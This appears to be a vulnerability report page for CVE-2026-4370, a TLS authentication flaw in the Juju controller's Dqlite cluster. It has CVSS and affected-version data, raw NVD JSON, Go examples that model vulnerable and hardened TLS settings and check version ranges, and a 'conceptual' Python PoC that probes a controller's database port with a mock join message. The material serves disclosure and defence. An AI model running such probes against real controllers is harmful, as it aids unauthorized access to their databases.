Security Vulnerability Report
CVE-2026-4370 CVSS 10.0 CRITICAL

CVE-2026-4370

Published: 2026-04-01 09:16:18
Last Modified: 2026-04-02 20:24:49

Description

A vulnerability was identified in Juju from version 3.2.0 until 3.6.19 and from version 4.0 until 4.0.4, where the internal Dqlite database cluster fails to perform proper TLS client and server authentication. Specifically, the Juju controller's database endpoint does not validate client certificates when a new node attempts to join the cluster. An unauthenticated attacker with network reachability to the Juju controller's Dqlite port can exploit this flaw to join the database cluster. Once joined, the attacker gains full read and write access to the underlying database, allowing for total data compromise.
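The two halves of the flaw described above (a listener that never asks the joining node for a certificate, and a dialer that does not verify the node it connects to) can be modelled with nothing but Go's standard library. The block below is an added example written for this page; it is not Juju's or go-dqlite's code and does not reproduce the project's actual fix or the Dqlite wire protocol. It mints a throwaway cluster CA and node certificates, stands up a loopback TLS listener in the weak configuration (`ClientAuth` left at its default) and in the hardened one (`RequireAndVerifyClientCert` plus a `ClientCAs` pool), and records which peers each side admits. The names juju-cluster-ca, controller-dqlite, legit-node, rogue-node and fake-controller are illustrative.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"net"
	"time"
)

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

// issueCert mints a throwaway ECDSA P-256 certificate for cn, signed by parent
// (self-signed when parent is nil). EKUs are left empty so one identity can both listen and dial.
func issueCert(cn string, isCA bool, parent *tls.Certificate) tls.Certificate {
	key := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(time.Now().UnixNano()), Subject: pkix.Name{CommonName: cn},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(24 * time.Hour),
		BasicConstraintsValid: true, IsCA: isCA,
		IPAddresses: []net.IP{net.IPv4(127, 0, 0, 1)}, // loopback SAN so a verifying dialer accepts it
	}
	signer, signerKey := tmpl, any(key)
	if parent != nil {
		signer, signerKey = parent.Leaf, parent.PrivateKey
	}
	der := must(x509.CreateCertificate(rand.Reader, tmpl, signer, &key.PublicKey, signerKey))
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key, Leaf: must(x509.ParseCertificate(der))}
}

// listenerConfig is what a node hands to its database listener. hardened=false reproduces the
// flaw: the node presents its own certificate but never demands one from the peer.
func listenerConfig(id tls.Certificate, clusterCA *x509.CertPool, hardened bool) *tls.Config {
	cfg := &tls.Config{Certificates: []tls.Certificate{id}, MinVersion: tls.VersionTLS12}
	if hardened { // CWE-306 + CWE-295 fix: demand a peer cert and chain it to the cluster CA
		cfg.ClientAuth, cfg.ClientCAs = tls.RequireAndVerifyClientCert, clusterCA
	}
	return cfg
}

// dialerConfig is what a node uses to dial a peer. verifyServer=false is the
// server-authentication half of the bug: such a dialer accepts an impostor.
func dialerConfig(clusterCA *x509.CertPool, verifyServer bool, ids ...tls.Certificate) *tls.Config {
	return &tls.Config{Certificates: ids, RootCAs: clusterCA, MinVersion: tls.VersionTLS12, InsecureSkipVerify: !verifyServer}
}

// attemptJoin runs one handshake against a loopback listener and reports whether the server
// accepted it. The verdict is taken server-side on purpose: under TLS 1.3 the client's
// handshake returns before the server has looked at the client certificate.
func attemptJoin(srvCfg, cliCfg *tls.Config) bool {
	ln := must(tls.Listen("tcp", "127.0.0.1:0", srvCfg))
	defer ln.Close()
	verdict := make(chan error, 1)
	go func() {
		c, err := ln.Accept()
		if err == nil {
			defer c.Close()
			err = c.(*tls.Conn).Handshake()
		}
		verdict <- err
	}()
	c, err := tls.Dial("tcp", ln.Addr().String(), cliCfg)
	srvErr := <-verdict // keep the client end open until the server has ruled
	if err == nil {
		c.Close()
	}
	return srvErr == nil
}

// Scenarios mints a cluster CA, a legitimate member and an attacker who holds only a
// self-minted CA, then reports which handshakes each side accepts (names are illustrative).
func Scenarios() map[string]bool {
	clusterCA, attackerCA := issueCert("juju-cluster-ca", true, nil), issueCert("attacker-ca", true, nil)
	controller := issueCert("controller-dqlite", false, &clusterCA)
	member := issueCert("legit-node", false, &clusterCA)
	rogue := issueCert("rogue-node", false, &attackerCA)
	impostor := issueCert("fake-controller", false, &attackerCA)
	pool := x509.NewCertPool()
	pool.AddCert(clusterCA.Leaf)
	anon := dialerConfig(nil, false) // attacker: no cert and no cluster CA, so nothing to verify with
	return map[string]bool{
		"vulnerable listener, anonymous joiner":    attemptJoin(listenerConfig(controller, pool, false), anon),
		"hardened listener, anonymous joiner":      attemptJoin(listenerConfig(controller, pool, true), anon),
		"hardened listener, rogue-CA joiner":       attemptJoin(listenerConfig(controller, pool, true), dialerConfig(nil, false, rogue)),
		"hardened listener, member joiner":         attemptJoin(listenerConfig(controller, pool, true), dialerConfig(pool, true, member)),
		"member verifies, impostor controller":     attemptJoin(listenerConfig(impostor, nil, false), dialerConfig(pool, true, member)),
		"member skips verify, impostor controller": attemptJoin(listenerConfig(impostor, nil, false), dialerConfig(pool, false, member)),
	}
}

func main() {
	for name, ok := range Scenarios() {
		fmt.Printf("%-42s accepted=%v\n", name, ok)
	}
}
```

Only the first scenario admits the anonymous peer, which is exactly the condition the description calls out; the hardened listener turns away both the certificate-less joiner and the one whose certificate chains to a CA the cluster does not trust, while still admitting the real member. The last pair shows why server authentication matters too: a member that dials with verification disabled will hand its traffic to any host that answers on the port. The same handshake test doubles as a check against a live endpoint: if a database listener completes a TLS handshake with a dialer that presents no certificate at all, it is not enforcing client authentication, whatever it does afterwards at the protocol layer.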

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* (3.2.0 <= version < 3.6.20) - VULNERABLE
cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* (4.0 <= version < 4.0.5) - VULNERABLE
Juju 3.2.0 - 3.6.19 (not affected from 3.6.20)
Juju 4.0 - 4.0.4 (not affected from 4.0.5)
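To check an inventory of controllers against the two ranges above, here is an added Go example (not part of the NVD record and not Juju code). It parses the numeric core of a version string in the form assumed to be printed by `juju version` (N.N.N with an optional -suffix, e.g. 3.6.19-genericlinux-amd64; this form is an assumption) and tests it against the versionStartIncluding / versionEndExcluding bounds copied from the record. Missing components count as zero, so 4.0 means 4.0.0; the suffix is ignored, so a pre-release build numbered 3.6.20 would be reported as unaffected and suffixed versions should be treated conservatively.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// affectedRange mirrors one NVD cpeMatch entry: versionStartIncluding <= v < versionEndExcluding.
type affectedRange struct{ startIncl, endExcl string }

// affectedRanges holds the two cpeMatch bounds from the NVD record for CVE-2026-4370.
var affectedRanges = []affectedRange{{"3.2.0", "3.6.20"}, {"4.0", "4.0.5"}}

// parseVersion reads the leading dotted-numeric core of a version string
// (assumed form N.N.N with an optional -suffix, as in "3.6.19-genericlinux-amd64").
// Missing components count as zero, so "4.0" equals "4.0.0"; the suffix is ignored,
// so a pre-release build numbered 3.6.20 would be reported as unaffected.
func parseVersion(s string) ([3]int, error) {
	var v [3]int
	core, _, _ := strings.Cut(strings.TrimPrefix(s, "v"), "-")
	parts := strings.Split(core, ".")
	if len(parts) > 3 {
		return v, fmt.Errorf("unrecognised version %q", s)
	}
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil || n < 0 {
			return v, fmt.Errorf("unrecognised version %q", s)
		}
		v[i] = n
	}
	return v, nil
}

// compareVersions returns -1, 0 or 1 for a < b, a == b, a > b.
func compareVersions(a, b [3]int) int {
	for i := range a {
		if a[i] < b[i] {
			return -1
		}
		if a[i] > b[i] {
			return 1
		}
	}
	return 0
}

// IsAffected reports whether version falls inside any affected range.
func IsAffected(version string) (bool, error) {
	v, err := parseVersion(version)
	if err != nil {
		return false, err
	}
	for _, r := range affectedRanges {
		lo, _ := parseVersion(r.startIncl) // range bounds are literals known to parse
		hi, _ := parseVersion(r.endExcl)
		if compareVersions(v, lo) >= 0 && compareVersions(v, hi) < 0 {
			return true, nil
		}
	}
	return false, nil
}

func main() {
	// Constructed sample inputs straddling both range boundaries, plus one unparsable value.
	for _, v := range []string{"3.1.9", "3.2.0", "3.6.19-genericlinux-amd64", "3.6.20", "4.0", "4.0.4", "4.0.5", "latest"} {
		affected, err := IsAffected(v)
		fmt.Printf("%-28s affected=%-5v err=%v\n", v, affected, err)
	}
}
```

The boundaries are the part worth getting right: 3.2.0 and 4.0 are affected (start inclusive), 3.6.20 and 4.0.5 are not (end exclusive), and anything that does not parse is reported as an error rather than silently treated as safe.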

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2026-4370: Juju Dqlite auth bypass.
# This script only models a malicious node opening a connection to the
# controller's database port. It does not implement the Dqlite/Raft wire
# protocol, so it cannot actually join the cluster or read the database.
import socket
import struct

TARGET_IP = "192.168.1.100"  # Juju controller IP (placeholder)
TARGET_PORT = 19002          # Port assumed by this PoC; confirm the controller's real Dqlite bind address


def exploit_juju_dqlite():
    print(f"[*] Attempting to join Juju Dqlite cluster at {TARGET_IP}:{TARGET_PORT}...")
    try:
        # 1. Establish a TCP connection to the Dqlite port. The context manager
        #    closes the socket even if a later step raises.
        with socket.create_connection((TARGET_IP, TARGET_PORT), timeout=5) as sock:
            # 2. Send a mock "join" request. The header below is a stand-in,
            #    not the real Dqlite handshake. In vulnerable versions the
            #    endpoint never asks the peer for a client certificate, so the
            #    connection is not rejected at the TLS layer.
            protocol_version = 1   # example value
            msg_type = 0x01        # example: JOIN
            payload = struct.pack("!IB", protocol_version, msg_type)
            sock.sendall(payload)  # sendall, not send: send() may write only part of the buffer

            # 3. Read whatever comes back. Any reply means the port accepted an
            #    unauthenticated peer; it does not by itself prove cluster membership.
            response = sock.recv(1024)
        if response:
            print("[+] Connection established and response received!")
            print(f"[+] Response: {response!r}")
            print("[+] Endpoint answered an unauthenticated peer (no client certificate was presented).")
            print("[+] A real join would continue with the Dqlite/Raft membership exchange from here.")
        else:
            print("[-] Connection closed without a response. Target may be patched, filtered, or expecting TLS first.")
    except OSError as e:
        print(f"[-] Exploit failed: {e}")


if __name__ == "__main__":
    exploit_juju_dqlite()
```

References

https://github.com/juju/juju/security/advisories/GHSA-gvrj-cjch-728p (Vendor Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4370",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T09:16:17.717",
    "lastModified": "2026-04-02T20:24:48.797",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was identified in Juju from version 3.2.0 until 3.6.19 and from version 4.0 until 4.0.4, where the internal Dqlite database cluster fails to perform proper TLS client and server authentication. Specifically, the Juju controller's database endpoint does not validate client certificates when a new node attempts to join the cluster. An unauthenticated attacker with network reachability to the Juju controller's Dqlite port can exploit this flaw to join the database cluster. Once joined, the attacker gains full read and write access to the underlying database, allowing for total data compromise."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 10.0,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-295"},
          {"lang": "en", "value": "CWE-306"}
        ]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-295"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.2.0",
                "versionEndExcluding": "3.6.20",
                "matchCriteriaId": "C1E8860B-D8C6-4795-A4F8-5EA1E8CB2381"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0",
                "versionEndExcluding": "4.0.5",
                "matchCriteriaId": "D900BC29-F5B7-4485-BB1D-42E9778D0A82"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/juju/juju/security/advisories/GHSA-gvrj-cjch-728p",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```